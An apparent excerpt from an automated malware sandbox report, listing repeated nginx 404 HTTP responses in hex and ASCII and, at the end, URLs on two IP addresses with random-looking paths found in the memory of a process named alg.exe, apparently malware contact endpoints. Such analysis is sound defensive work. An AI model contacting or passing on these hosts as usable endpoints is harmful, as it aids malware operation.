6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:27:08 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.251.16.150/
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.251.16.150/fkcgbfiiatbbgsse
Source: alg.exe, 00000010.00000003.2946550482.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2943510653.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.251.16.150/rfuetphopheyd5e
Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.251.16.150/xgyulldvremqd
Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.251.16.150/xgyulldvremqdsJiM4
Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.251.16.150:80/fkcgbfiiatbbgsseZ
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138/
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138/95Z4
Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138/E6
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138/I6
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138/e6
Source: alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138/hmsaqgigfaxqle
Source: alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138/tpnpycqre
Source: alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.138:80/hmsaqgigfaxqleZ
